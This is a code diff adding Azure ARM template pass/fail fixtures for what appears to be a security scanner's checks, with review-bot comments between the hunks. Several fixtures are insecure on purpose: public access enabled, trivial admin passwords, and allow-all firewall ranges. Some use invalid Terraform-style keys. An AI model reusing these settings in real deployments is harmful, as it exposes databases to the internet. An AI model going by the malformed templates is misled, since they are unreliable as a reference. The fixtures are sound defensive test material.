+ "name": "[parameters('virtualNetworkName')]", + "location": "[parameters('location')]", + "properties": { + "addressSpace": { + "addressPrefixes": [ + "[parameters('vnetAddressPrefix')]" + ] + } + } + }, + { + "type": "Microsoft.Network/virtualNetworks/subnets", + "apiVersion": "2023-09-01", + "name": "[format('{0}/{1}', parameters('virtualNetworkName'), parameters('subnetName'))]", + "properties": { + "addressPrefix": "[parameters('subnetPrefix')]" + }, + "dependsOn": [ + "[resourceId('Microsoft.Network/virtualNetworks', parameters('virtualNetworkName'))]" + ] + }, + { + "type": "Microsoft.DBforMySQL/servers", + "apiVersion": "2017-12-01", + "name": "pass", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('skuName')]", + "tier": "[parameters('SkuTier')]", + "capacity": "[parameters('skuCapacity')]", + "size": "[format('{0}', parameters('SkuSizeMB'))]", + "family": "[parameters('skuFamily')]" + }, + "properties": { + "createMode": "Default", + "version": "[parameters('mysqlVersion')]", + "administratorLogin": "[parameters('administratorLogin')]", + "administratorLoginPassword": "[parameters('administratorLoginPassword')]", + "storageProfile": { + "storageMB": "[parameters('SkuSizeMB')]", + "backupRetentionDays": "[parameters('backupRetentionDays')]", + "geoRedundantBackup": "[parameters('geoRedundantBackup')]" + }, + "minimalTlsVersion": "TLS1_2", + "sslEnforcement": "Enabled" + } + }, + { + "copy": { + "name": "firewallRules", + "count": "[length(variables('firewallrules'))]", + "mode": "serial", + "batchSize": 1 + }, + "type": "Microsoft.DBforMySQL/servers/firewallRules", + "apiVersion": "2017-12-01", + "name": "[format('{0}/{1}', parameters('serverName'), variables('firewallrules')[copyIndex()].Name)]", + "properties": { + "startIpAddress": "[variables('firewallrules')[copyIndex()].StartIpAddress]", + "endIpAddress": "[variables('firewallrules')[copyIndex()].EndIpAddress]" + }, + "dependsOn": [ + 
"[resourceId('Microsoft.DBforMySQL/servers', parameters('serverName'))]"
+ ]
+ }
+ ],
+ "outputs": {
+ "location": {
+ "type": "string",
+ "value": "[parameters('location')]"
+ },
+ "name": {
+ "type": "string",
+ "value": "[parameters('serverName')]"
+ },
+ "resourceGroupName": {
+ "type": "string",
+ "value": "[resourceGroup().name]"
+ },
+ "resourceId": {
+ "type": "string",
+ "value": "[resourceId('Microsoft.DBforMySQL/servers', parameters('serverName'))]"
+ }
+ }
+}
diff --git a/tests/arm/checks/resource/example_PostgreSQLServerPublicAccessDisable/fail1.json b/tests/arm/checks/resource/example_PostgreSQLServerPublicAccessDisable/fail1.json
new file mode 100644
index 00000000000..d0d5292e5c9
--- /dev/null
+++ b/tests/arm/checks/resource/example_PostgreSQLServerPublicAccessDisable/fail1.json
@@ -0,0 +1,29 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.DBforPostgreSQL/servers",
+ "apiVersion": "2021-02-01",
+ "name": "fail1",
+ "location": "[azurerm_resource_group.example.location]",
+ "sku": {
+ "name": "GP_Gen5_4"
+ },
+ "properties": {
+ "administrator_login": "psqladminun",
+ "administrator_login_password": "1234",
+ "version": "9.6",
+ "storageProfile": {
+ "storageMB": 640000,
+ "backupRetentionDays": 7,
+ "geoRedundantBackup": "Enabled",
+ "auto_grow_enabled": "Enabled"
+ },
+ "publicNetworkAccess": "Enabled",
+ "ssl_enforcement_enabled": true,
+ "ssl_minimal_tls_version_enforced": "TLS1_2"
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_PostgreSQLServerPublicAccessDisable/fail2.json b/tests/arm/checks/resource/example_PostgreSQLServerPublicAccessDisable/fail2.json
new file mode 100644
index 00000000000..286cc40d588
--- /dev/null
+++ b/tests/arm/checks/resource/example_PostgreSQLServerPublicAccessDisable/fail2.json
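Review bot: The `firewallrules` variable in this pass fixture still opens the server to every address (`rule1` and `rule2` both span `0.0.0.0`–`255.255.255.255`), even though the file is the positive example for the minimum-TLS check. The test for this check presumably reads only `minimalTlsVersion`, so the result is unaffected, but a reader copying the "pass" template gets an allow-all firewall rule next to TLS 1.2. Narrowing both rules to a single address, e.g. `"StartIpAddress": "10.0.0.4", "EndIpAddress": "10.0.0.4"`, keeps the fixture honest without touching what the check reads. Separately, the server resource is named `pass` while `dependsOn` and `outputs` resolve `parameters('serverName')`, so the template would not hang together as a real deployment.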
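Review bot: The property keys in `fail1.json` are Terraform attribute names rather than ARM ones — `administrator_login`, `administrator_login_password`, `auto_grow_enabled`, `ssl_enforcement_enabled`, `ssl_minimal_tls_version_enforced` — and `location` uses the Terraform expression `[azurerm_resource_group.example.location]`, which is not an ARM template function. The check only reads `publicNetworkAccess`, so the test still fails as intended, but the fixture does not represent a deployable template and could mislead anyone using it as a reference. I would switch to the ARM names used by the other PostgreSQL fixtures in this change, e.g. `"administratorLogin": "psqladminun"`, `"sslEnforcement": "Enabled"`, `"minimalTlsVersion": "TLS1_2"`, and `"location": "[resourceGroup().location]"`.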
@@ -0,0 +1,29 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.DBforPostgreSQL/servers",
+ "apiVersion": "2021-02-01",
+ "name": "fail2",
+ "location": "[azurerm_resource_group.example.location]",
+ "sku": {
+ "name": "GP_Gen5_4"
+ },
+ "properties": {
+ "administrator_login": "psqladminun",
+ "administrator_login_password": "1234",
+ "version": "9.6",
+ "storageProfile": {
+ "storageMB": 640000,
+ "backupRetentionDays": 7,
+ "geoRedundantBackup": "Enabled",
+ "auto_grow_enabled": "Enabled"
+ },
+ "publicNetworkAccess": "Enabled",
+ "ssl_enforcement_enabled": true,
+ "ssl_minimal_tls_version_enforced": "TLS1_2"
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_PostgreSQLServerPublicAccessDisable/pass.json b/tests/arm/checks/resource/example_PostgreSQLServerPublicAccessDisable/pass.json
new file mode 100644
index 00000000000..087bdef5630
--- /dev/null
+++ b/tests/arm/checks/resource/example_PostgreSQLServerPublicAccessDisable/pass.json
@@ -0,0 +1,26 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.DBforPostgreSQL/servers",
+ "apiVersion": "2021-02-01",
+ "name": "pass",
+ "location": "[azurerm_resource_group.example.location]",
+ "properties": {
+ "administrator_login": "psqladminun",
+ "administrator_login_password": "1234",
+ "version": "9.6",
+ "storageProfile": {
+ "storageMB": 640000,
+ "backupRetentionDays": 7,
+ "geoRedundantBackup": "Enabled",
+ "auto_grow_enabled": "Enabled"
+ },
+ "publicNetworkAccess": "Disabled",
+ "ssl_enforcement_enabled": true,
+ "ssl_minimal_tls_version_enforced": "TLS1_2"
+ }
+ }
+ ]
+}
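Review bot: `fail2.json` is identical to `fail1.json` apart from the resource name, so the second negative fixture exercises no additional path of the check. The sibling `example_PostgressSQLGeoBackupEnabled/fail2.json` in this same change uses its second failing fixture for the property-absent case; I would do the same here by deleting the line `"publicNetworkAccess": "Enabled",` so that the check's handling of a missing key is pinned (the service default is public access as far as I recall, which is worth confirming before relying on it). The Terraform-style keys (`administrator_login`, `ssl_enforcement_enabled`, ...) and the `[azurerm_resource_group.example.location]` expression appear here too and are not valid ARM.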
diff --git a/tests/arm/checks/resource/example_PostgressSQLGeoBackupEnabled/fail1.json b/tests/arm/checks/resource/example_PostgressSQLGeoBackupEnabled/fail1.json
new file mode 100644
index 00000000000..5596d39fa19
--- /dev/null
+++ b/tests/arm/checks/resource/example_PostgressSQLGeoBackupEnabled/fail1.json
@@ -0,0 +1,27 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.DBforPostgreSQL/servers",
+ "apiVersion": "2017-12-01",
+ "name": "fail1",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "administratorLogin": "psqladminun",
+ "administratorLoginPassword": "blabla",
+ "version": "9.6",
+ "storageProfile": {
+ "storageMB": 640000,
+ "backupRetentionDays": 7,
+ "geoRedundantBackup": "Disabled"
+ },
+ "sslEnforcement": "Enabled",
+ "minimalTlsVersion": "TLS1_2"
+ },
+ "sku": {
+ "name": "GP_Gen5_4"
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_PostgressSQLGeoBackupEnabled/fail2.json b/tests/arm/checks/resource/example_PostgressSQLGeoBackupEnabled/fail2.json
new file mode 100644
index 00000000000..ba14b8f7001
--- /dev/null
+++ b/tests/arm/checks/resource/example_PostgressSQLGeoBackupEnabled/fail2.json
@@ -0,0 +1,26 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.DBforPostgreSQL/servers",
+ "apiVersion": "2017-12-01",
+ "name": "fail2",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "administratorLogin": "psqladminun",
+ "administratorLoginPassword": "blabla",
+ "version": "9.6",
+ "storageProfile": {
+ "storageMB": 640000,
+ "backupRetentionDays": 7
+ },
+ "sslEnforcement": "Enabled",
+ "minimalTlsVersion": "TLS1_2"
+ },
+ "sku": {
+ "name": "GP_Gen5_4"
+ }
+ }
+ ]
+}
\ No newline at end of file
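Review bot: The fixture directory is spelled `example_PostgressSQLGeoBackupEnabled` with a doubled `s`, while every other PostgreSQL directory in this change uses `PostgreSQL`. If the check class carries the same spelling the test loader will find the fixtures, but the typo then leaks into anything keyed on the class name; I would rename both to `PostgreSQLGeoBackupEnabled` (the check class itself is outside this hunk, so I cannot confirm how it is spelled). The fixture content is fine: `fail1.json` pins the explicit `"geoRedundantBackup": "Disabled"` case and `fail2.json` the property-absent case.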
diff --git a/tests/arm/checks/resource/example_PostgressSQLGeoBackupEnabled/pass.json b/tests/arm/checks/resource/example_PostgressSQLGeoBackupEnabled/pass.json
new file mode 100644
index 00000000000..cfd6508c642
--- /dev/null
+++ b/tests/arm/checks/resource/example_PostgressSQLGeoBackupEnabled/pass.json
@@ -0,0 +1,27 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.DBforPostgreSQL/servers",
+ "apiVersion": "2017-12-01",
+ "name": "pass",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "administratorLogin": "psqladminun",
+ "administratorLoginPassword": "blabla",
+ "version": "9.6",
+ "storageProfile": {
+ "storageMB": 640000,
+ "backupRetentionDays": 7,
+ "geoRedundantBackup": "Enabled"
+ },
+ "sslEnforcement": "Enabled",
+ "minimalTlsVersion": "TLS1_2"
+ },
+ "sku": {
+ "name": "GP_Gen5_4"
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_PubsubSKUSLA/fail.json b/tests/arm/checks/resource/example_PubsubSKUSLA/fail.json
new file mode 100644
index 00000000000..7ddcc188e35
--- /dev/null
+++ b/tests/arm/checks/resource/example_PubsubSKUSLA/fail.json
@@ -0,0 +1,127 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.13.1.58284", + "templateHash": "18262070107935981048" + } + }, + "parameters": { + "wpsName": { + "type": "string", + "defaultValue": "[uniqueString(resourceGroup().id)]", + "minLength": 3, + "maxLength": 63, + "metadata": { + "description": "The name for your new Web PubSub instance." + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "The region in which to create the new instance, defaults to the same location as the resource group." + } + }, + "unitCount": { + "type": "int", + "defaultValue": 1, + "allowedValues": [ + 1, + 2, + 5, + 10, + 20, + 50, + 100 + ], + "metadata": { + "description": "Unit count" + } + }, + "sku": { + "type": "string", + "defaultValue": "Free_F1", + "allowedValues": [ + "Standard_S1", + "Free_F1" + ], + "metadata": { + "description": "SKU name" + } + }, + "pricingTier": { + "type": "string", + "defaultValue": "Free", + "allowedValues": [ + "Free", + "Standard" + ], + "metadata": { + "description": "Pricing tier" + } + } + }, + "resources": [ + { + "type": "Microsoft.SignalRService/webPubSub", + "apiVersion": "2021-10-01", + "name": "fail", + "location": "[parameters('location')]", + "sku": { + "capacity": "[parameters('unitCount')]", + "name": "Free_F1", + "tier": "[parameters('pricingTier')]" + }, + "identity": { + "type": "None" + }, + "properties": { + "disableAadAuth": false, + "disableLocalAuth": false, + "liveTraceConfiguration": { + "categories": [ + { + "enabled": "false", + "name": "ConnectivityLogs" + }, + { + "enabled": "false", + "name": "MessagingLogs" + } + ], + "enabled": "false" + }, + "networkACLs": { + "defaultAction": "Deny", + "publicNetwork": { + "allow": [ + "ServerConnection", + "ClientConnection", + "RESTAPI", + "Trace" + ] + 
} + }, + "publicNetworkAccess": "Enabled", + "resourceLogConfiguration": { + "categories": [ + { + "enabled": "true", + "name": "ConnectivityLogs" + }, + { + "enabled": "true", + "name": "MessagingLogs" + } + ] + }, + "tls": { + "clientCertEnabled": false + } + } + } + ] +} diff --git a/tests/arm/checks/resource/example_PubsubSKUSLA/pass.json b/tests/arm/checks/resource/example_PubsubSKUSLA/pass.json new file mode 100644 index 00000000000..2c46bc3a699 --- /dev/null +++ b/tests/arm/checks/resource/example_PubsubSKUSLA/pass.json 
@@ -0,0 +1,127 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.13.1.58284", + "templateHash": "18262070107935981048" + } + }, + "parameters": { + "wpsName": { + "type": "string", + "defaultValue": "[uniqueString(resourceGroup().id)]", + "minLength": 3, + "maxLength": 63, + "metadata": { + "description": "The name for your new Web PubSub instance." + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "The region in which to create the new instance, defaults to the same location as the resource group." + } + }, + "unitCount": { + "type": "int", + "defaultValue": 1, + "allowedValues": [ + 1, + 2, + 5, + 10, + 20, + 50, + 100 + ], + "metadata": { + "description": "Unit count" + } + }, + "sku": { + "type": "string", + "defaultValue": "Free_F1", + "allowedValues": [ + "Standard_S1", + "Free_F1" + ], + "metadata": { + "description": "SKU name" + } + }, + "pricingTier": { + "type": "string", + "defaultValue": "Free", + "allowedValues": [ + "Free", + "Standard" + ], + "metadata": { + "description": "Pricing tier" + } + } + }, + "resources": [ + { + "type": "Microsoft.SignalRService/webPubSub", + "apiVersion": "2021-10-01", + "name": "pass", + "location": "[parameters('location')]", + "sku": { + "capacity": "[parameters('unitCount')]", + "name": "Standard_S1", + "tier": "[parameters('pricingTier')]" + }, + "identity": { + "type": "None" + }, + "properties": { + "disableAadAuth": false, + "disableLocalAuth": false, + "liveTraceConfiguration": { + "categories": [ + { + "enabled": "false", + "name": "ConnectivityLogs" + }, + { + "enabled": "false", + "name": "MessagingLogs" + } + ], + "enabled": "false" + }, + "networkACLs": { + "defaultAction": "Deny", + "publicNetwork": { + "allow": [ + "ServerConnection", + "ClientConnection", + "RESTAPI", + "Trace" + 
]
+ }
+ },
+ "publicNetworkAccess": "Enabled",
+ "resourceLogConfiguration": {
+ "categories": [
+ {
+ "enabled": "true",
+ "name": "ConnectivityLogs"
+ },
+ {
+ "enabled": "true",
+ "name": "MessagingLogs"
+ }
+ ]
+ },
+ "tls": {
+ "clientCertEnabled": false
+ }
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_PubsubSpecifyIdentity/fail.json b/tests/arm/checks/resource/example_PubsubSpecifyIdentity/fail.json
new file mode 100644
index 00000000000..cbf15bc37af
--- /dev/null
+++ b/tests/arm/checks/resource/example_PubsubSpecifyIdentity/fail.json
@@ -0,0 +1,32 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.SignalRService/webPubSub",
+ "apiVersion": "2021-02-01",
+ "name": "fail",
+ "location": "[parameters('location')]",
+ "sku": {
+ "name": "Free_F1",
+ "capacity": 1
+ },
+ "properties": {
+ "liveTraceConfiguration": {
+ "enabled": "true",
+ "categories": [
+ {
+ "name": "MessagingLogs",
+ "enabled": "true"
+ },
+ {
+ "name": "ConnectivityLogs",
+ "enabled": "false"
+ }
+ ]
+ }
+ },
+ "publicNetworkAccess": "Disabled"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_PubsubSpecifyIdentity/pass.json b/tests/arm/checks/resource/example_PubsubSpecifyIdentity/pass.json
new file mode 100644
index 00000000000..21e588b8bff
--- /dev/null
+++ b/tests/arm/checks/resource/example_PubsubSpecifyIdentity/pass.json
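Review bot: In the Web PubSub pass fixture `sku.name` is pinned to `Standard_S1` but `sku.tier` is still `[parameters('pricingTier')]`, whose default is `Free`, and the `sku` parameter declared in the template is never referenced. If the check only inspects `sku.name` the test passes, but a `Standard_S1`/`Free` pair is, as far as I know, not accepted by the service, and the dangling parameter is confusing for anyone reading the positive example. I would set `"tier": "Standard"` explicitly here and either use the `sku` parameter or remove it.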
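Review bot: `publicNetworkAccess` is placed at the resource top level, beside `properties`, rather than inside `properties` where the Microsoft.SignalRService/webPubSub schema defines it, as far as I can tell. The identity check does not read it, so the fixture still fails for the intended reason (no `identity` block), but ARM ignores an unknown top-level key, and any other check in this repo that looks for `properties.publicNetworkAccess` would treat this resource as publicly reachable. I would move the line under `properties`, i.e. `"properties": { "liveTraceConfiguration": { ... }, "publicNetworkAccess": "Disabled" }`.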
@@ -0,0 +1,35 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.SignalRService/webPubSub",
+ "apiVersion": "2021-02-01",
+ "name": "pass",
+ "location": "[parameters('location')]",
+ "sku": {
+ "name": "Standard_S1",
+ "capacity": 1
+ },
+ "identity": {
+ "type": "SystemAssigned"
+ },
+ "properties": {
+ "liveTraceConfiguration": {
+ "enabled": "true",
+ "categories": [
+ {
+ "name": "MessagingLogs",
+ "enabled": "true"
+ },
+ {
+ "name": "ConnectivityLogs",
+ "enabled": "false"
+ }
+ ]
+ }
+ },
+ "publicNetworkAccess": "Disabled"
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_PubsubSpecifyIdentity/pass2.json b/tests/arm/checks/resource/example_PubsubSpecifyIdentity/pass2.json
new file mode 100644
index 00000000000..da9da23ff57
--- /dev/null
+++ b/tests/arm/checks/resource/example_PubsubSpecifyIdentity/pass2.json
@@ -0,0 +1,35 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.SignalRService/webPubSub",
+ "apiVersion": "2021-02-01",
+ "name": "pass2",
+ "location": "[parameters('location')]",
+ "sku": {
+ "name": "Standard_S1",
+ "capacity": 1
+ },
+ "identity": {
+ "type": "UserAssigned"
+ },
+ "properties": {
+ "liveTraceConfiguration": {
+ "enabled": "true",
+ "categories": [
+ {
+ "name": "MessagingLogs",
+ "enabled": "true"
+ },
+ {
+ "name": "ConnectivityLogs",
+ "enabled": "false"
+ }
+ ]
+ }
+ },
+ "publicNetworkAccess": "Disabled"
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_SQLDatabaseZoneRedundant/fail.json b/tests/arm/checks/resource/example_SQLDatabaseZoneRedundant/fail.json
new file mode 100644
index 00000000000..cc5468e7f6c
--- /dev/null
+++ b/tests/arm/checks/resource/example_SQLDatabaseZoneRedundant/fail.json
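Review bot: `pass2.json` declares `"identity": { "type": "UserAssigned" }` with no `userAssignedIdentities` map, which a real deployment would reject as far as I know, because a user-assigned identity has to name the identity resource it binds. That is enough for a check that only tests whether `identity.type` is set, but the positive example should show the complete shape, e.g. add `"userAssignedIdentities": { "[resourceId('Microsoft.ManagedIdentity/userAssignedIdentities', 'example')]": {} }` inside `identity`. As in the other fixtures in this directory, `publicNetworkAccess` sits at the resource top level rather than under `properties`.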
@@ -0,0 +1,24 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Sql/servers/databases",
+ "apiVersion": "2014-04-01",
+ "name": "fail",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "collation": "SQL_Latin1_General_CP1_CI_AS",
+ "licenseType": "LicenseIncluded",
+ "maxSizeBytes": 4,
+ "readScale": "Enabled"
+ },
+ "sku": {
+ "name": "S0"
+ },
+ "tags": {
+ "environment": "Production"
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_SQLDatabaseZoneRedundant/fail2.json b/tests/arm/checks/resource/example_SQLDatabaseZoneRedundant/fail2.json
new file mode 100644
index 00000000000..da2202c28fc
--- /dev/null
+++ b/tests/arm/checks/resource/example_SQLDatabaseZoneRedundant/fail2.json
@@ -0,0 +1,25 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Sql/servers/databases",
+ "apiVersion": "2014-04-01",
+ "name": "fail2",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "collation": "SQL_Latin1_General_CP1_CI_AS",
+ "licenseType": "LicenseIncluded",
+ "maxSizeBytes": 4,
+ "readScale": "Enabled",
+ "zoneRedundant": false
+ },
+ "sku": {
+ "name": "S0"
+ },
+ "tags": {
+ "environment": "Production"
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_SQLDatabaseZoneRedundant/pass.json b/tests/arm/checks/resource/example_SQLDatabaseZoneRedundant/pass.json
new file mode 100644
index 00000000000..dafe40ecd3c
--- /dev/null
+++ b/tests/arm/checks/resource/example_SQLDatabaseZoneRedundant/pass.json
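Review bot: `fail2.json` pairs `"apiVersion": "2014-04-01"` with `"zoneRedundant": false`, but that property only exists in the later `Microsoft.Sql/servers/databases` API versions (from `2017-10-01-preview` onward, as far as I recall), so the fixture would not validate as a real template. The check presumably just looks up `properties.zoneRedundant` and the result is unaffected, but bumping the fixtures to e.g. `"apiVersion": "2021-11-01"` keeps them realistic. Coverage of the negative path is otherwise good: `fail.json` omits the key and `fail2.json` sets it to `false`.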
@@ -0,0 +1,25 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Sql/servers/databases",
+ "apiVersion": "2014-04-01",
+ "name": "pass",
+ "location": "[resourceGroup().location]",
+ "properties": {
+ "collation": "SQL_Latin1_General_CP1_CI_AS",
+ "licenseType": "LicenseIncluded",
+ "maxSizeBytes": 4,
+ "readScale": "Enabled",
+ "zoneRedundant": true
+ },
+ "sku": {
+ "name": "S0"
+ },
+ "tags": {
+ "environment": "Production"
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_StorageAccountName/camelCase.json b/tests/arm/checks/resource/example_StorageAccountName/camelCase.json
new file mode 100644
index 00000000000..9ca0e623de7
--- /dev/null
+++ b/tests/arm/checks/resource/example_StorageAccountName/camelCase.json
@@ -0,0 +1,19 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Storage/storageAccounts",
+ "apiVersion": "2021-04-01",
+ "name": "thisIsWrong",
+ "location": "westeurope",
+ "kind": "StorageV2",
+ "sku": {
+ "name": "Standard_GRS"
+ },
+ "tags": {
+ "environment": "staging"
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_StorageAccountName/kebabCase.json b/tests/arm/checks/resource/example_StorageAccountName/kebabCase.json
new file mode 100644
index 00000000000..2fe0ca24f73
--- /dev/null
+++ b/tests/arm/checks/resource/example_StorageAccountName/kebabCase.json
@@ -0,0 +1,19 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Storage/storageAccounts",
+ "apiVersion": "2021-04-01",
+ "name": "this-is-wrong",
+ "location": "westeurope",
+ "kind": "StorageV2",
+ "sku": {
+ "name": "Standard_GRS"
+ },
+ "tags": {
+ "environment": "staging"
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_StorageAccountName/pass.json b/tests/arm/checks/resource/example_StorageAccountName/pass.json
new file mode 100644
index 00000000000..0b706b15265
--- /dev/null
+++ b/tests/arm/checks/resource/example_StorageAccountName/pass.json
@@ -0,0 +1,20 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Storage/storageAccounts",
+ "apiVersion": "2021-04-01",
+ "name": "storageaccountname",
+ "location": "westeurope",
+ "kind": "StorageV2",
+ "sku": {
+ "name": "Standard_GRS",
+ "tier": "Standard"
+ },
+ "tags": {
+ "environment": "staging"
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_StorageAccountName/passNumber.json b/tests/arm/checks/resource/example_StorageAccountName/passNumber.json
new file mode 100644
index 00000000000..3f6d62d0776
--- /dev/null
+++ b/tests/arm/checks/resource/example_StorageAccountName/passNumber.json
@@ -0,0 +1,19 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Storage/storageAccounts",
+ "apiVersion": "2021-04-01",
+ "name": "1234567890",
+ "location": "westeurope",
+ "kind": "StorageV2",
+ "sku": {
+ "name": "Standard_GRS"
+ },
+ "tags": {
+ "environment": "staging"
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_StorageAccountName/tooLong.json b/tests/arm/checks/resource/example_StorageAccountName/tooLong.json
new file mode 100644
index 00000000000..5a293d521fa
--- /dev/null
+++ b/tests/arm/checks/resource/example_StorageAccountName/tooLong.json
@@ -0,0 +1,19 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.Storage/storageAccounts",
+ "apiVersion": "2021-04-01",
+ "name": "thisiswayyyyyytoooloooong",
+ "location": "westeurope",
+ "kind": "StorageV2",
+ "sku": {
+ "name": "Standard_GRS"
+ },
+ "tags": {
+ "environment": "staging"
+ }
+ }
+ ]
+}
diff --git a/tests/arm/checks/resource/example_StorageAccountsUseReplication/fail.json b/tests/arm/checks/resource/example_StorageAccountsUseReplication/fail.json
new file mode 100644
index 00000000000..248e4d3be5a
--- /dev/null
+++ b/tests/arm/checks/resource/example_StorageAccountsUseReplication/fail.json
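Review bot: The naming fixtures cover upper-case letters (`camelCase.json`), a hyphen (`kebabCase.json`) and a 25-character name (`tooLong.json`), but not the lower bound: Azure storage account names must be 3–24 lowercase letters and digits, and nothing here pins the "too short" branch, so a pattern that only caps the length would still pass the suite. I would add a `tooShort.json` that differs only in `"name": "ab"`. A fixture whose name is an unresolved expression, e.g. `"name": "[parameters('storageAccountName')]"`, would also be worth having so the check is shown not to flag templated names as invalid.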
@@ -0,0 +1,50 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.13.1.58284", + "templateHash": "13120038605368246703" + } + }, + "parameters": { + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "The storage account location." + } + }, + "storageAccountName": { + "type": "string", + "defaultValue": "[format('store{0}', uniqueString(resourceGroup().id))]", + "metadata": { + "description": "The name of the storage account" + } + } + }, + "resources": [ + { + "type": "Microsoft.Storage/storageAccounts", + "apiVersion": "2022-09-01", + "name": "fail", + "location": "[parameters('location')]", + "sku": { + "name": "Standard_LRS" + }, + "kind": "StorageV2", + "properties": {} + } + ], + "outputs": { + "storageAccountName": { + "type": "string", + "value": "[parameters('storageAccountName')]" + }, + "storageAccountId": { + "type": "string", + "value": "[resourceId('Microsoft.Storage/storageAccounts', parameters('storageAccountName'))]" + } + } +} diff --git a/tests/arm/checks/resource/example_StorageAccountsUseReplication/pass.json b/tests/arm/checks/resource/example_StorageAccountsUseReplication/pass.json new file mode 100644 index 00000000000..c3946a6630c --- /dev/null +++ b/tests/arm/checks/resource/example_StorageAccountsUseReplication/pass.json 
